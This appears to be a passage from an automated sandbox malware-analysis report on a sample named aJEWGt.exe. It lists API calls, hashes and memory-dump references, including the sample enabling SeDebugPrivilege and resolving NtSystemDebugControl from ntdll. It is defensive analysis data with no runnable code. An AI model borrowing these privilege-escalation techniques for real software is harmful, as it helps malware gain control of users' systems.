                            • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                            • String ID: C:\Users\user\AppData\Local\Temp\aJEWGt.exe$SeDebugPrivilege
                            • API String ID: 4123949106-1774801302
                            • Opcode ID: 2390801fe337746c2056dc0be24c8976ef1a5fa312fb252ff2068342db0542cd
                            • Instruction ID: 777525df9108785b0979755bb5c42abe5c000b0e52fc4592d77e7beb6740b0f7
                            • Opcode Fuzzy Hash: 2390801fe337746c2056dc0be24c8976ef1a5fa312fb252ff2068342db0542cd
                            • Instruction Fuzzy Hash: B03183B1E002AAEADF60DBA7CD45FEEBBB8EB44704F104569E505B7281D7309E45CB60
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00AE1334
                            • GetProcAddress.KERNEL32(00000000), ref: 00AE133B
                            • memset.MSVCRT ref: 00AE1359
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProcmemset
                            • String ID: NtSystemDebugControl$ntdll.dll
                            • API String ID: 3137504439-2438149413
                            • Opcode ID: 8a3adf4485680713a00b3d119f9a003dfd24e45ec2865c7e35d5a3d8e10fe74a
                            • Instruction ID: cf9b175183f129de0d1410b4d9e603aeac91308ee4f2c17a1a47072de7fc3d11
                            • Opcode Fuzzy Hash: 8a3adf4485680713a00b3d119f9a003dfd24e45ec2865c7e35d5a3d8e10fe74a
                            • Instruction Fuzzy Hash: 98015B7260029ABFDF10DF96AC89A6FBBACFB45314F00456AF911AA141E27086558B51
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: strrchr$lstrcmpilstrcpylstrlen
                            • String ID:
                            • API String ID: 3636361484-0
                            • Opcode ID: 2297c51745b9d46fdbab0343b525e3272e0de2118e606a55a5bb0d8c2a504811
                            • Instruction ID: 373938d71841a18fa051e878649237c7da5948c41b9fe651219f64af4aa7faaa
                            • Opcode Fuzzy Hash: 2297c51745b9d46fdbab0343b525e3272e0de2118e606a55a5bb0d8c2a504811
                            • Instruction Fuzzy Hash: FA01DB739042A56FDF10D760DC48BE6779CDB04310F440065F945D7090D6749E858B90
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
                            • srand.MSVCRT ref: 00AE1878
                            • rand.MSVCRT ref: 00AE1880
                            • srand.MSVCRT ref: 00AE1890
                            • rand.MSVCRT ref: 00AE1894
                            Memory Dump Source
                            • Source File: 00000001.00000002.2635934735.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                            • Associated: 00000001.00000002.2635749518.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636160559.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.2636218430.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_ae0000_aJEWGt.jbxd
                            Similarity
                            • API ID: Timerandsrand$FileSystem
                            • String ID:
                            • API String ID: 4106363736-0
                            • Opcode ID: 00206501626b8fa81447dadbc0e05e6abbdc81058ef757b0ce5956361dbf7e92
                            • Instruction ID: 6240f7a49db1f0218f020682c8272682e98df545d1ca7e5d0886a3e3e8ab59b3
                            • Opcode Fuzzy Hash: 00206501626b8fa81447dadbc0e05e6abbdc81058ef757b0ce5956361dbf7e92
                            • Instruction Fuzzy Hash: 6BE04877A10218BBDB00E7F9EC8A99EBBACDE84161B110567F600D3254E574FD458BB4